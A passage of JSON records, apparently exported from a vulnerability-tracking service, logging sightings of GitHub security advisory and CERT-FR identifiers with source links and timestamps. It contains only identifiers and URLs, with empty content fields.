"https://gist.github.com/safer-bot/ecf71be0f50720e248267b8d040d6660", "content": "", "creation_timestamp": "2025-07-16T20:07:49.000000Z"}, {"uuid": "9ff73606-3b84-4c33-8b79-03debccb373b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/ecf71be0f50720e248267b8d040d6660", "content": "", "creation_timestamp": "2025-07-16T20:07:49.000000Z"}, {"uuid": "c7ef8264-92d9-4c4e-900e-faa4b5aeefa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/ecf71be0f50720e248267b8d040d6660", "content": "", "creation_timestamp": "2025-07-16T20:07:49.000000Z"}, {"uuid": "0a82fa2c-7d2a-444a-9128-2e57e9735710", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h9mq-f6q5-6c8m", "type": "seen", "source": "https://gist.github.com/safer-bot/e99c53adf7d0285b48dff97d88c6c48e", "content": "", "creation_timestamp": "2025-07-16T20:10:13.000000Z"}, {"uuid": "25f2756a-8831-4802-944d-55be99ce81bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p4qx-6w5p-4rj2", "type": "seen", "source": "https://gist.github.com/safer-bot/e99c53adf7d0285b48dff97d88c6c48e", "content": "", "creation_timestamp": "2025-07-16T20:10:13.000000Z"}, {"uuid": "e17f8678-f642-4047-b198-2c7d7b2e92c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/e99c53adf7d0285b48dff97d88c6c48e", "content": "", "creation_timestamp": "2025-07-16T20:10:13.000000Z"}, {"uuid": "6cd04ca4-5d56-4033-bc1e-8dc2f3e4ba20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/e99c53adf7d0285b48dff97d88c6c48e", "content": "", "creation_timestamp": "2025-07-16T20:10:13.000000Z"}, {"uuid": "90024cba-e6a2-43df-b999-eddfd853d70d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v62j-cxhh-fq22", "type": "seen", "source": "https://gist.github.com/safer-bot/e99c53adf7d0285b48dff97d88c6c48e", "content": "", "creation_timestamp": "2025-07-16T20:10:13.000000Z"}, {"uuid": "5a2bd744-da98-47dd-8292-d1a75ec59775", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/5b7abd4c7e70ba3f64d5a217985d4a0b", "content": "", "creation_timestamp": "2025-07-16T20:11:19.000000Z"}, {"uuid": "6f266a16-07f9-4fb6-9366-d5492d766f28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/cec688f292a03e3b2796a0be6df7b474", "content": "", "creation_timestamp": "2025-07-16T20:21:15.000000Z"}, {"uuid": "680b66a7-6053-43fe-a657-bffde2ebe040", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/8e70234cf8fba692a651a6a914cbf3a2", "content": "", "creation_timestamp": "2025-07-16T22:57:59.000000Z"}, {"uuid": "de13f2bc-b68c-4726-807a-7a6c48cd938a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/8e70234cf8fba692a651a6a914cbf3a2", "content": "", "creation_timestamp": "2025-07-16T22:57:59.000000Z"}, {"uuid": "e97f2108-7637-4e4c-9464-ac163e81713e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-668q-qrv7-99fm", "type": "seen", "source": "https://gist.github.com/safer-bot/8e70234cf8fba692a651a6a914cbf3a2", "content": "", "creation_timestamp": "2025-07-16T22:57:59.000000Z"}, {"uuid": "2222aedb-d673-4124-a5a5-2743df36df28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/8e70234cf8fba692a651a6a914cbf3a2", "content": "", "creation_timestamp": "2025-07-16T22:57:59.000000Z"}, {"uuid": "d65dc3f7-7923-48f1-9f19-416f8d0216ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/8e70234cf8fba692a651a6a914cbf3a2", "content": "", "creation_timestamp": "2025-07-16T22:57:59.000000Z"}, {"uuid": "a798408d-0648-4ff1-91ba-872da6f27087", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/8e70234cf8fba692a651a6a914cbf3a2", "content": "", "creation_timestamp": "2025-07-16T22:57:59.000000Z"}, {"uuid": "5e176181-90c5-495b-a4f0-9d32752ee6d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/8e70234cf8fba692a651a6a914cbf3a2", "content": "", "creation_timestamp": "2025-07-16T22:57:59.000000Z"}, {"uuid": "e5e0428e-c3e1-40ce-97dc-a796243c5a34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/11a572f83a1081383beca51676500bd5", "content": "", "creation_timestamp": "2025-07-16T23:04:13.000000Z"}, {"uuid": "a3581c5f-6710-4e94-be35-786bd2532f23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3x8x-79m2-3w2w", "type": "seen", "source": "https://gist.github.com/safer-bot/11a572f83a1081383beca51676500bd5", "content": "", "creation_timestamp": "2025-07-16T23:04:13.000000Z"}, {"uuid": "c097a216-ec90-4122-b958-6b2cdd302d1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wf8f-6423-gfxg", "type": "seen", "source": "https://gist.github.com/safer-bot/11a572f83a1081383beca51676500bd5", "content": "", "creation_timestamp": "2025-07-16T23:04:13.000000Z"}, {"uuid": "9b51fab9-ff86-483f-9eb7-c309a5c61042", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/11a572f83a1081383beca51676500bd5", "content": "", "creation_timestamp": "2025-07-16T23:04:13.000000Z"}, {"uuid": "aacd0f73-1b9e-4c82-bec7-5acd844970d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/11a572f83a1081383beca51676500bd5", "content": "", "creation_timestamp": "2025-07-16T23:04:13.000000Z"}, {"uuid": "4c0662cc-9150-4f76-b664-5e54928b62ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fxph-q3j8-mv87", "type": "seen", "source": "https://gist.github.com/safer-bot/62883cd4661804d1a75775554f90cda5", "content": "", "creation_timestamp": "2025-07-16T23:07:52.000000Z"}, {"uuid": "3b76078c-6879-49da-afc0-06365c53695d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jfh8-c2jp-5v3q", "type": "seen", "source": "https://gist.github.com/safer-bot/62883cd4661804d1a75775554f90cda5", "content": "", "creation_timestamp": "2025-07-16T23:07:52.000000Z"}, {"uuid": "167cb94d-a1f1-410b-91ad-69a296039670", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p6xc-xr62-6r2g", "type": "seen", "source": "https://gist.github.com/safer-bot/62883cd4661804d1a75775554f90cda5", "content": "", "creation_timestamp": "2025-07-16T23:07:52.000000Z"}, {"uuid": "6777da8a-75c8-4e22-90bd-883da0a98edb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7rjr-3q55-vv33", "type": "seen", "source": "https://gist.github.com/safer-bot/62883cd4661804d1a75775554f90cda5", "content": "", "creation_timestamp": "2025-07-16T23:07:52.000000Z"}, {"uuid": "efb431e1-36e1-4645-85d8-79cd0ee259e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8489-44mv-ggj8", "type": "seen", "source": "https://gist.github.com/safer-bot/62883cd4661804d1a75775554f90cda5", "content": "", "creation_timestamp": "2025-07-16T23:07:52.000000Z"}, {"uuid": "6b3c1dfd-0a28-4af7-8e6a-48995ea70208", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vwqq-5vrc-xw9h", "type": "seen", "source": "https://gist.github.com/safer-bot/62883cd4661804d1a75775554f90cda5", "content": "", "creation_timestamp": "2025-07-16T23:07:52.000000Z"}, {"uuid": "3a30b2fe-4a6e-48fe-b44d-704771c14bae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/0c6983b0947b50e9aa027e27507b3fe5", "content": "", "creation_timestamp": "2025-07-16T23:06:16.000000Z"}, {"uuid": "81793abc-f479-44a9-a6d5-679b41ea510b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/0c6983b0947b50e9aa027e27507b3fe5", "content": "", "creation_timestamp": "2025-07-16T23:06:16.000000Z"}, {"uuid": "92b47ebb-7bc8-4b3a-b261-1dba1850aa75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7f88-5hhx-67m2", "type": "seen", "source": "https://gist.github.com/safer-bot/9e63934fd6e0eaa1e038643bf4aad55a", "content": "", "creation_timestamp": "2025-07-16T23:09:23.000000Z"}, {"uuid": "89aaab48-244e-4100-9f52-e24fc5607602", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qgrq-cx4c-2rmm", "type": "seen", "source": "https://gist.github.com/safer-bot/9e63934fd6e0eaa1e038643bf4aad55a", "content": "", "creation_timestamp": "2025-07-16T23:09:23.000000Z"}, {"uuid": "8f654e82-1885-4ae2-9ad8-86e94831141e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/9e63934fd6e0eaa1e038643bf4aad55a", "content": "", "creation_timestamp": "2025-07-16T23:09:23.000000Z"}, {"uuid": "7b286f82-75ee-4b21-93cb-b0cdfa5077e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7fhr-2694-rg79", "type": "seen", "source": "https://gist.github.com/safer-bot/9e63934fd6e0eaa1e038643bf4aad55a", "content": "", "creation_timestamp": "2025-07-16T23:09:23.000000Z"}, {"uuid": "248d803d-7a27-4f92-a20c-334e580e57ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p6j8-hgv5-m35g", "type": "seen", "source": "https://gist.github.com/safer-bot/9e63934fd6e0eaa1e038643bf4aad55a", "content": "", "creation_timestamp": "2025-07-16T23:09:23.000000Z"}, {"uuid": "a1066763-4f8a-4d70-899c-40f3576ccb74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/9e63934fd6e0eaa1e038643bf4aad55a", "content": "", "creation_timestamp": "2025-07-16T23:09:23.000000Z"}, {"uuid": "ae93ef56-019c-4f61-b4d5-86fd3002c569", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jmj6-p2j9-68cp", "type": "seen", "source": "https://gist.github.com/safer-bot/9e63934fd6e0eaa1e038643bf4aad55a", "content": "", "creation_timestamp": "2025-07-16T23:09:23.000000Z"}, {"uuid": "7059369b-ddfd-4d9f-a39b-a00e5db48785", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/9e63934fd6e0eaa1e038643bf4aad55a", "content": "", "creation_timestamp": "2025-07-16T23:09:23.000000Z"}, {"uuid": "af38af4d-ef17-4550-bc36-a2d98e9dd515", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/9e63934fd6e0eaa1e038643bf4aad55a", "content": "", "creation_timestamp": "2025-07-16T23:09:23.000000Z"}, {"uuid": "c34e0d42-68cf-422c-858f-15d5ff57ac02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5499-qjvh-6j7w", "type": "seen", "source": "https://gist.github.com/safer-bot/9e63934fd6e0eaa1e038643bf4aad55a", "content": "", "creation_timestamp": "2025-07-16T23:09:23.000000Z"}, {"uuid": "a0e270b4-e926-46b9-aa89-ff6cd64ec38f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6phf-6h5g-97j2", "type": "seen", "source": "https://gist.github.com/safer-bot/c81d3266ab71564959e88ea4e0939208", "content": "", "creation_timestamp": "2025-07-16T23:11:35.000000Z"}, {"uuid": "e4824e5f-4c45-469d-b52b-70d5a8f07e6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/c81d3266ab71564959e88ea4e0939208", "content": "", "creation_timestamp": "2025-07-16T23:11:35.000000Z"}, {"uuid": "ce0b1ee5-54aa-4a61-b473-009e75b02c2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h3wv-47xm-4mg6", "type": "seen", "source": "https://gist.github.com/safer-bot/c81d3266ab71564959e88ea4e0939208", "content": "", "creation_timestamp": "2025-07-16T23:11:35.000000Z"}, {"uuid": "209f918b-d3a5-4d3e-b718-c28916c3e415", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/9e6f2a1e110eec958b729f68fea46e05", "content": "", "creation_timestamp": "2025-07-16T23:13:16.000000Z"}, {"uuid": "d2955717-b8cd-4434-8134-1d0447b6076d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/9e6f2a1e110eec958b729f68fea46e05", "content": "", "creation_timestamp": "2025-07-16T23:13:16.000000Z"}, {"uuid": "3186bd57-9381-47de-be0e-4292a9e97918", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/9e6f2a1e110eec958b729f68fea46e05", "content": "", "creation_timestamp": "2025-07-16T23:13:16.000000Z"}, {"uuid": "746c2aef-4379-4355-a80b-db0412359503", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/9e6f2a1e110eec958b729f68fea46e05", "content": "", "creation_timestamp": "2025-07-16T23:13:16.000000Z"}, {"uuid": "21a4edba-3046-43db-9602-8bb52d0986ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gmc5-9mpc-xg75", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/49", "content": "", "creation_timestamp": "2025-07-16T20:32:46.000000Z"}, {"uuid": "b5ff22db-2c13-4a27-8036-cda31672b6c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5j98-mcp5-4vw2", "type": "seen", "source": "https://gist.github.com/deepak-chowdry/3da737fb0b4c63ed1bfe586c677e4860", "content": "", "creation_timestamp": "2025-12-02T03:16:32.000000Z"}, {"uuid": "fb3f6a62-2530-4c15-ad84-b9d457041f70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5pgg-2g8v-p4x9", "type": "seen", "source": "https://gist.github.com/deepak-chowdry/3da737fb0b4c63ed1bfe586c677e4860", "content": "", "creation_timestamp": "2025-12-02T03:16:32.000000Z"}, {"uuid": "e0e16c5c-0a49-42c5-80be-8db5944bfebb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v2c8-vqqp-hv3g", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/150", "content": "", "creation_timestamp": "2025-09-05T22:31:13.000000Z"}, {"uuid": "b10b5913-c4d9-42e5-a5d4-a37edf6c1591", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-013", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115266136468526536", "content": "", "creation_timestamp": "2025-09-25T17:34:24.884071Z"}, {"uuid": "cb50873d-f1f3-41d2-8279-a32c2a0fab47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v2c8-vqqp-hv3g", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/150", "content": "", "creation_timestamp": "2025-09-05T22:31:13.000000Z"}, {"uuid": "a8af7c50-7c08-4740-8e35-b288f9aed643", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-52f5-9888-hmc6", "type": "seen", "source": "https://gist.github.com/HPCCSmoketest/d08d0f519e8e977cea9e949370baa615", "content": "", "creation_timestamp": "2025-10-14T09:47:39.000000Z"}, {"uuid": "686552fa-8062-4b01-916f-bdbde36ed0d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-prrf-397v-83xh", "type": "seen", "source": "https://gist.github.com/konard/ae5644ee09391620c298630fdcf2722d", "content": "", "creation_timestamp": "2025-10-26T10:04:24.000000Z"}, {"uuid": "a81e558a-126b-4019-aa4b-55d7582df215", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6px8-22w5-w334", "type": "seen", "source": "https://gist.github.com/konard/ae5644ee09391620c298630fdcf2722d", "content": "", "creation_timestamp": "2025-10-26T10:04:24.000000Z"}, {"uuid": "1cd17d0d-8c14-4055-8f0c-e622e152f7b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5qj-9vmx-7g6g", "type": "seen", "source": "https://gist.github.com/konard/ae5644ee09391620c298630fdcf2722d", "content": "", "creation_timestamp": "2025-10-26T10:04:24.000000Z"}, {"uuid": "7221ec0f-df35-48ba-abf1-6b5dfc20339a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xjx-v99w-gqf3", "type": "seen", "source": "https://gist.github.com/konard/ae5644ee09391620c298630fdcf2722d", "content": "", "creation_timestamp": "2025-10-26T10:04:24.000000Z"}, {"uuid": "bda57a66-febc-4f1c-914a-86f876661f94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rm8p-cx58-hcvx", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3lupidus46d2k", "content": "", "creation_timestamp": "2025-07-24T12:00:52.377218Z"}, {"uuid": "0b2b558f-41f2-4af1-be2d-a2a5fb204c25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6px8-22w5-w334", "type": "seen", "source": "https://gist.github.com/konard/6d326d82c106078cb7d1ed31ad37e3dc", "content": "", "creation_timestamp": "2025-10-26T10:16:49.000000Z"}, {"uuid": "b9f1bff3-ae9b-4c7b-bdab-e710276a6565", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v2c8-vqqp-hv3g", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/150", "content": "", "creation_timestamp": "2025-09-05T22:31:13.000000Z"}, {"uuid": "280406fa-8b11-43dc-8145-09d77f565938", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-prrf-397v-83xh", "type": "seen", "source": "https://gist.github.com/konard/59299c7a612be7a27ce4cee24019182d", "content": "", "creation_timestamp": "2025-10-26T10:42:38.000000Z"}, {"uuid": "263dc979-665d-4060-8392-671f416add63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xjx-v99w-gqf3", "type": "seen", "source": "https://gist.github.com/konard/9a45991491fc328bb9bae6c4b4373147", "content": "", "creation_timestamp": "2025-10-26T10:42:33.000000Z"}, {"uuid": "b1d78dac-c307-49b7-917c-8e39ff292a1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hxm8-vfpq-jrfc", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q4/214", "content": "", "creation_timestamp": "2025-11-27T16:04:55.000000Z"}, {"uuid": "ebf4043c-3131-4db7-a407-19a8e10cb8d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59j7-ghrg-fj52", "type": "seen", "source": "https://gist.github.com/konard/965638546cc157352293bc04186ffcbd", "content": "", "creation_timestamp": "2025-12-01T13:07:24.000000Z"}, {"uuid": "4d25613e-fe33-4c99-be90-981129054ca6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5crp-9r3c-p9vr", "type": "seen", "source": "https://gist.github.com/konard/965638546cc157352293bc04186ffcbd", "content": "", "creation_timestamp": "2025-12-01T13:07:24.000000Z"}, {"uuid": "a492a94c-a390-489c-b061-cbb6553e366e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6px8-22w5-w334", "type": "seen", "source": "https://gist.github.com/konard/59299c7a612be7a27ce4cee24019182d", "content": "", "creation_timestamp": "2025-10-26T10:42:38.000000Z"}, {"uuid": "3d0a29ef-3c4c-44d3-90be-5a5d566b4a21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9hjg-9r4m-mvj7", "type": "seen", "source": "https://gist.github.com/Token-Eater/a4d1d6ce67e8450e1a8f456b468e3599", "content": "", "creation_timestamp": "2025-11-05T11:48:09.000000Z"}, {"uuid": "904d9c16-01b3-48f6-9332-47c41f56a787", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9wx4-h78v-vm56", "type": "seen", "source": "https://gist.github.com/Token-Eater/a4d1d6ce67e8450e1a8f456b468e3599", "content": "", "creation_timestamp": "2025-11-05T11:48:09.000000Z"}, {"uuid": "c95d5ea0-b753-452d-b587-c6f6ad7a2776", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-031", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3luzkxm7f3t27", "content": "", "creation_timestamp": "2025-07-28T12:14:19.524130Z"}, {"uuid": "7b5edd53-4277-446f-b72f-323a39dbf1ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-031", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3luzmkc5u432w", "content": "", "creation_timestamp": "2025-07-28T12:42:40.314484Z"}, {"uuid": "da0913ec-fc93-4291-b39f-a50b67c56e59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vvgc-356p-c3xw", "type": "seen", "source": 